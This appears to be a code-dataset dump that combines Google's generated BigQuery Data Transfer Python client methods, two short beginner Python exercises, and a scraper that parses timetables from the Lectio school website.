specifies where data should be stored. When a new
transfer configuration is created, the specified
destination_dataset_id is created when needed and
shared with the appropriate data source service
account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.GetTransferConfigRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.GetTransferConfigRequest):
request = datatransfer.GetTransferConfigRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_transfer_config]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_transfer_configs(
self,
request: datatransfer.ListTransferConfigsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferConfigsPager:
r"""Returns information about all data transfers in the
project.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferConfigsRequest):
The request object. A request to list data transfers
configured for a BigQuery project.
parent (str):
Required. The BigQuery project id for which data sources
should be returned: ``projects/{project_id}`` or
``projects/{project_id}/locations/{location_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferConfigsPager:
The returned list of pipelines in the
project.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferConfigsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferConfigsRequest):
request = datatransfer.ListTransferConfigsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_configs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferConfigsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def schedule_transfer_runs(
self,
request: datatransfer.ScheduleTransferRunsRequest = None,
*,
parent: str = None,
start_time: timestamp.Timestamp = None,
end_time: timestamp.Timestamp = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.ScheduleTransferRunsResponse:
r"""Creates transfer runs for a time range [start_time, end_time].
For each date - or whatever granularity the data source supports
- in the range, one transfer run is created. Note that runs are
created per UTC time in the time range. DEPRECATED: use
StartManualTransferRuns instead.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ScheduleTransferRunsRequest):
The request object. A request to schedule transfer runs
for a time range.
parent (str):
Required. Transfer configuration name in the form:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Required. Start time of the range of transfer runs. For
example, ``"2017-05-25T00:00:00+00:00"``.
This corresponds to the ``start_time`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
end_time (google.protobuf.timestamp_pb2.Timestamp):
Required. End time of the range of transfer runs. For
example, ``"2017-05-30T00:00:00+00:00"``.
This corresponds to the ``end_time`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.ScheduleTransferRunsResponse:
A response to schedule transfer runs
for a time range.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, start_time, end_time])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ScheduleTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ScheduleTransferRunsRequest):
request = datatransfer.ScheduleTransferRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if start_time is not None:
request.start_time = start_time
if end_time is not None:
request.end_time = end_time
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.schedule_transfer_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def start_manual_transfer_runs(
self,
request: datatransfer.StartManualTransferRunsRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.StartManualTransferRunsResponse:
r"""Start manual transfer runs to be executed now with schedule_time
equal to current time. The transfer runs can be created for a
time range where the run_time is between start_time (inclusive)
and end_time (exclusive), or for a specific run_time.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.StartManualTransferRunsRequest):
The request object. A request to start manual transfer
runs.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.StartManualTransferRunsResponse:
A response to start manual transfer
runs.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.StartManualTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.StartManualTransferRunsRequest):
request = datatransfer.StartManualTransferRunsRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.start_manual_transfer_runs
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get_transfer_run(
self,
request: datatransfer.GetTransferRunRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transfer.TransferRun:
r"""Returns information about the particular transfer
run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.GetTransferRunRequest):
The request object. A request to get data transfer run
information.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.TransferRun:
Represents a data transfer run.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.GetTransferRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.GetTransferRunRequest):
request = datatransfer.GetTransferRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_transfer_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_transfer_run(
self,
request: datatransfer.DeleteTransferRunRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the specified transfer run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.DeleteTransferRunRequest):
The request object. A request to delete data transfer
run information.
name (str):
Required. The field will contain name of the resource
requested, for example:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.DeleteTransferRunRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.DeleteTransferRunRequest):
request = datatransfer.DeleteTransferRunRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_transfer_run]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
def list_transfer_runs(
self,
request: datatransfer.ListTransferRunsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferRunsPager:
r"""Returns information about running and completed jobs.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferRunsRequest):
The request object. A request to list data transfer
runs. UI can use this method to show/filter specific
data transfer runs. The data source can use this method
to request all scheduled transfer runs.
parent (str):
Required. Name of transfer configuration for which
transfer runs should be retrieved. Format of transfer
configuration resource name is:
``projects/{project_id}/transferConfigs/{config_id}`` or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferRunsPager:
The returned list of pipelines in the
project.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferRunsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferRunsRequest):
request = datatransfer.ListTransferRunsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_runs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferRunsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def list_transfer_logs(
self,
request: datatransfer.ListTransferLogsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTransferLogsPager:
r"""Returns user facing log messages for the data
transfer run.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.ListTransferLogsRequest):
The request object. A request to get user facing log
messages associated with data transfer run.
parent (str):
Required. Transfer run name in the form:
``projects/{project_id}/transferConfigs/{config_id}/runs/{run_id}``
or
``projects/{project_id}/locations/{location_id}/transferConfigs/{config_id}/runs/{run_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.services.data_transfer_service.pagers.ListTransferLogsPager:
The returned list transfer run
messages.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.ListTransferLogsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.ListTransferLogsRequest):
request = datatransfer.ListTransferLogsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_transfer_logs]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTransferLogsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def check_valid_creds(
self,
request: datatransfer.CheckValidCredsRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datatransfer.CheckValidCredsResponse:
r"""Returns true if valid credentials exist for the given
data source and requesting user.
Some data sources doesn't support service account, so we
need to talk to them on behalf of the end user. This API
just checks whether we have OAuth token for the
particular user, which is a pre-requisite before user
can create a transfer config.
Args:
request (google.cloud.bigquery_datatransfer_v1.types.CheckValidCredsRequest):
The request object. A request to determine whether the
user has valid credentials. This method is used to limit
the number of OAuth popups in the user interface. The
user id is inferred from the API call context.
If the data source has the Google+ authorization type,
this method returns false, as it cannot be determined
whether the credentials are already valid merely based
on the user id.
name (str):
Required. The data source in the form:
``projects/{project_id}/dataSources/{data_source_id}``
or
``projects/{project_id}/locations/{location_id}/dataSources/{data_source_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.bigquery_datatransfer_v1.types.CheckValidCredsResponse:
A response indicating whether the
credentials exist and are valid.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a datatransfer.CheckValidCredsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, datatransfer.CheckValidCredsRequest):
request = datatransfer.CheckValidCredsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.check_valid_creds]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-bigquery-datatransfer",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DataTransferServiceClient",)
| [
"noreply@github.com"
] | gopinath678.noreply@github.com |
33a2426cc882562c11052d366fdcd3b93f062ae7 | 4fc1193295eaa239e62994d75f13f5a4c42621ce | /An Introduction to Interactive Programming in Python (Part 1)/Week 0 - Statements, expressions, variables/19.py | 71d4f308773971cb3d31bea2b0f4f9beeb8be3d2 | [] | no_license | Mahmoud-Shosha/Fundamentals-of-Computing-Specialization-Coursera | 296ec8a586a81ec51309c5c214ab0829f0f643be | 8f2339918547de43038a6ceffd815199ba365ff9 | refs/heads/master | 2020-12-08T20:32:43.559287 | 2020-05-11T19:47:52 | 2020-05-11T19:47:52 | 233,085,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,392 | py | """
Given the pre-defined variables name (a string) and age (a number), write an assignment statement
that defines a variable statement whose value is the string "% is % years old."
where the percents should be replaced by name and the string form of age.
"""
# Compute the statement about a person's name and age, given the person's name and age.
###################################################
# Tests
# Student should uncomment ONLY ONE of the following at a time.
# Test 1 - Select the following lines and use ctrl+shift+k to uncomment.
name = "Joe Warren"
age = 52
# Test 2 - Select the following lines and use ctrl+shift+k to uncomment.
#name = "Scott Rixner"
#age = 40
# Test 3 - Select the following lines and use ctrl+shift+k to uncomment.
#name = "John Greiner"
#age = 46
###################################################
# Name and age formula
# Student should enter formula on the next line.
statement = name + " is " + str(age) + " years old."
###################################################
# Test output
# Student should not change this code.
print statement
###################################################
# Expected output
# Student should look at the following comments and compare to printed output.
# Test 1 output:
#Joe Warren is 52 years old.
# Test 2 output:
#Scott Rixner is 40 years old.
# Test 3 output:
#John Greiner is 46 years old.
| [
"mahmoud.aboelsoud.p@gmail.com"
] | mahmoud.aboelsoud.p@gmail.com |
63ba5f08bc473d75ea7024b86e0a8b57bd844fe2 | 6e6b019129c572075f962481a5b53a9d0bf8b85c | /delete_methods_list.py | f97b67af5905df1586078544380b7020b7a7dfac | [] | no_license | rathinitish29/Python | de291fde14c22a5fed2e965ce650a9c6f723a1c4 | 24e0cf24a992642de6e05b63eddb66faeb41e9c1 | refs/heads/master | 2022-12-08T01:09:09.748555 | 2020-08-24T16:40:29 | 2020-08-24T16:40:29 | 283,421,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | # common methods to delete data from list
fruit = ['mango', 'banana','apple','orange']
print(fruit)
#pop() method
fruit.pop(1)
print(fruit)
#del[] operator
del fruit[1]
print(fruit)
#remove()method
fruit.remove('mango')
print(fruit)
#to add data = append,insert,extend
#to delete = pop,del,remove | [
"noreply@github.com"
] | rathinitish29.noreply@github.com |
ec27c3e337d387838915a713ed556f02f4d35e8c | 2d4e3eb624975b30a034f00b081cdf77fd76f205 | /scrapers/timetable.py | b2c70b523220a03296421b4c2798e5dfdd471441 | [
"MIT"
] | permissive | boh1996/LectioAPI | 14060566c6cac3711ef672a1366d4959dceb8b4c | 2dcf5928d994b2a407040cabf59db799e8880025 | refs/heads/master | 2021-01-18T22:26:55.982729 | 2016-04-17T13:05:14 | 2016-04-17T13:05:14 | 12,767,098 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,891 | py | #!/usr/bin/python
# -*- coding: utf8 -*-
from bs4 import BeautifulSoup as Soup
import urls
import re
import proxy
from datetime import *
import time
from time import mktime
import functions
from pytz import timezone
import authenticate
#s2module-bg s2time-off
def sameDay ( date, dayOfWeek, week, year ):
theDay = datetime.fromtimestamp(mktime(time.strptime("%s %s %s %s %s" % ("12", "00", dayOfWeek , week, year),"%H %M %w %W %Y")))
return theDay.date() == date.date()
def timetable( config, url, week, year, session = False ):
if session == False:
cookies = {}
else:
if session == True:
session = authenticate.authenticate(config)
# Insert the session information from the auth function
cookies = {
"lecmobile" : "0",
"ASP.NET_SessionId" : session["ASP.NET_SessionId"],
"LastLoginUserName" : session["LastLoginUserName"],
"lectiogsc" : session["lectiogsc"],
"LectioTicket" : session["LectioTicket"]
}
# Sorting settings
settings = {
}
# Insert User-agent headers and the cookie information
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
"Content-Type" : "application/x-www-form-urlencoded",
"Host" : "www.lectio.dk",
"Origin" : "https://www.lectio.dk",
"Cookie" : functions.implode(cookies, "{{index}}={{value}}", "; ")
}
response = proxy.session.get(url, headers=headers)
html = response.text
soup = Soup(html)
if soup.find("table", attrs={"id" : "s_m_Content_Content_SkemaNyMedNavigation_skema_skematabel"}) is None:
return {
"status" : False,
"error" : "Data not found"
}
# Fetch all rows in the table
rows = soup.find("table", attrs={"id" : "s_m_Content_Content_SkemaNyMedNavigation_skema_skematabel"}).findAll("tr")
# Fetch module info, to make it possible to draw a complete timetable
moduleInfo = []
moduleInfoProg = re.compile(r"(?P<module_number>.*)\. (?P<start_time>.*) - (?P<end_time>.*)")
for row in soup.findAll("div", attrs={"class" : "s2module-info"}):
moduleInfoGroups = moduleInfoProg.match(row.text.strip().replace("modul", ""))
if not moduleInfoGroups is None:
start = moduleInfoGroups.group("start_time")
if len(start) < 5:
start = "0" + start
end = moduleInfoGroups.group("end_time")
if len(end) < 5:
end = "0" + end
moduleInfo.append({
"module" : moduleInfoGroups.group("module_number"),
"start" : start,
"end" : end
})
# Fetch the general information celss
generalInformationDays = rows[2].findAll("td")
generalInformation = []
holidayElements = []
# Loop through all the cells, and look for information
index = 0
for tdRow in generalInformationDays:
index = index+1
dayOfWeek = index-1
if dayOfWeek == 7:
dayOfWeek = 0
if index > 1:
row = tdRow.findAll("a")
# Loop over the link elements, in the cell
if not row == None and len(row) > 0:
for element in row:
# The time module uses "0" as the first week of the year
if int(week) == 1:
timeWeek = 0
else:
# Subtract one, because 0 is the first week
timeWeek = int(week)-1
date = time.strptime("%s %s %s" % (str(dayOfWeek),str(timeWeek), str(year)),"%w %W %Y")
content = element.find("div", attrs={"class" : "s2skemabrikcontent"}).findAll("span")[1]
div = element.find("div", attrs={"class" : "s2skemabrikcontent"})
href = None
# If the a tag has a href, fetch it
try:
href = element["href"]
except BaseException:
pass
if href == None:
generalInformation.append({
"message" : unicode(content.text),
"date" : datetime.fromtimestamp(mktime(date)),
"school_id" : str(config["school_id"]),
"branch_id" : str(config["branch_id"]),
"term" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"week" : week,
"year" : year
})
else:
# Compile the regular expression
prog = re.compile(r"\/lectio\/(?P<school_id>[0-9]*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>[0-9]*)&(?P<prev_url>.*)")
activityGroups = prog.match(element["href"])
generalInformation.append({
"message" : unicode(content.text),
"activity_id" : activityGroups.group("activity_id"),
"status" : "changed" if "s2changed" in div["class"] else "cancelled" if "s2cancelled" in div["class"] else "normal",
"date" : datetime.fromtimestamp(mktime(date)),
"school_id" : str(config["school_id"]),
"branch_id" : str(config["branch_id"]),
"term" : soup.find("select", attrs={"id" : "s_m_ChooseTerm_term"}).select('option[selected="selected"]')[0]["value"],
"week" : week,
"year" : year
})
# Find all the day elements
timeElements = []
headers = []
headerRows = rows[1].findAll("td")
headerRows.pop(0)
headerProg = re.compile(ur"(?P<day_name>.*) \((?P<day>.*)\/(?P<month>.*)\)")
for row in headerRows:
headerGroups = headerProg.match(row.text)
headerYear = year
if not headerGroups is None:
if int(week) == 1 and int(headerGroups.group("month")) == 12:
headerYear = str(int(year) - 1)
headers.append({
"day" : headerGroups.group("day_name"),
"date" : datetime.strptime("%s-%s-%s %s" % (functions.zeroPadding(headerGroups.group("day")), functions.zeroPadding(headerGroups.group("month")), headerYear, "12:00"), "%d-%m-%Y %H:%M")
})
dayElements = rows[3].findAll("td")
dayElements.pop(0)
# Loop over the days
index = 0
dayOfWeek = 1
for dayElement in dayElements:
# Increment the day
index = index+1
# Test
dayOfWeek = index
if dayOfWeek == 7:
dayOfWeek = 0
# The time module uses "0" as the first week of the year
if int(week) == 1:
timeWeek = 0
else:
# Subtract one, because 0 is the first week
timeWeek = int(week)-1
# Find all the "a" tags, representing timetable elements
timetableElements = dayElement.findAll("a")
moduleIndex = 1
for checkElement in dayElement.findAll(attrs={"class" : "s2module-bg"}):
if "s2time-off" in checkElement["class"]:
# Get time from module info elements
holidayElements.append({
"start" : datetime.strptime("%s-%s-%s %s" % (headers[index-1]["date"].strftime("%d"), headers[index-1]["date"].strftime("%m"), headers[index-1]["date"].strftime("%Y"), moduleInfo[moduleIndex-1]["start"]), "%d-%m-%Y %H:%M"),
"end" : datetime.strptime("%s-%s-%s %s" % (headers[index-1]["date"].strftime("%d"), headers[index-1]["date"].strftime("%m"), headers[index-1]["date"].strftime("%Y"), moduleInfo[moduleIndex-1]["end"]), "%d-%m-%Y %H:%M")
})
moduleIndex = moduleIndex + 1
# Loop over the timetable elements
for timetableElement in timetableElements:
#The type of the event, "private" or "school"
type = None
# Locate the different types of information in the url, and find the different RegEx groups
expressions = [
{"type" : "private", "expression" : r"\/lectio\/(?P<school_id>[0-9]*)\/privat_aftale.aspx\?aftaleid=(?P<activity_id>[0-9]*)"},
{"type" : "school", "expression" : r"\/lectio\/(?P<school_id>[0-9]*)\/aktivitet\/aktivitetinfo.aspx\?id=(?P<activity_id>[0-9]*)&(?P<prev_url>.*)"},
{"type" : "outgoing_censor", "expression" : r"\/lectio\/(?P<school_id>.*)\/proevehold.aspx\?type=udgcensur&outboundCensorID=(?P<outbound_censor_id>.*)&prevurl=(?P<prev_url>.*)"},
{"type" : "exam", "expression" : r"\/lectio\/(?P<school_id>.*)\/proevehold.aspx\?type=proevehold&ProeveholdId=(?P<test_team_id>.*)&prevurl=(?P<prev_url>.*)"}
]
# Loop over the expressions
groups = []
type = "other"
for expressionObject in expressions:
prog = re.compile(expressionObject["expression"])
if prog.match(timetableElement["href"]):
groups = prog.match(timetableElement["href"])
type = expressionObject["type"]
# Locate the status div
div = timetableElement.find("div", attrs={"class" : "s2skemabrikcontent"})
# A list of the teachers
teachers = []
# A list of the assigned teams
teams = []
# Find all the info span elements
infoSpanObjects = timetableElement.findAll("span")
# Loop over the Info spans
for span in infoSpanObjects:
id = None
# Test if property exists
try:
id = span["lectiocontextcard"]
except BaseException:
pass
if not id == None:
# Team
if span["lectiocontextcard"][0] == "H":
# Append the team
teams.append({
"context_card_id" : span["lectiocontextcard"],
"title" : unicode(span.text),
"team_id" : span["lectiocontextcard"].replace("HE", "")
})
# Teacher
elif span["lectiocontextcard"][0] == "T":
teachers.append({
"abbrevation" : unicode(span.text),
"context_card_id" : span["lectiocontextcard"],
"teacher_id" : span["lectiocontextcard"].replace("T", "")
})
# Get the titletext where to extract start and end times from
title = timetableElement["title"]
# Match the title, to extract the start and end time
timeProg = re.compile(r"(?P<start_hour>[0-9]*):(?P<start_minute>[0-9]*) til (?P<end_hour>[0-9]*):(?P<end_minute>[0-9]*)")
timeGroups = timeProg.search(unicode(title).encode("utf8"), re.MULTILINE)
# Get the "main sections" separated by a double return \n\n
mainSections = title.split("\n\n")
# Grab the top section and split it by a single return \n
topSection = mainSections[0].split("\n")
# Initialize variables, assume that nothing is cancelled or changed
isChangedOrCancelled = 0
isCancelled = False
isChanged = False
# If the first item in the top section doesn't contain 'til',
# it must be either cancelled or changed
if not "til" in topSection[0]:
isChangedOrCancelled = 1
# If it says 'Aflyst!'
if "Aflyst!" in topSection[0]:
# It must be cancelled
isCancelled = True
else:
# Otherwise it must be changed
isChanged = True
if not timeGroups is None:
startTime = datetime.fromtimestamp(mktime(time.strptime("%s %s %s %s %s" % (timeGroups.group("start_hour"),timeGroups.group("start_minute"), dayOfWeek , timeWeek, year),"%H %M %w %W %Y")))
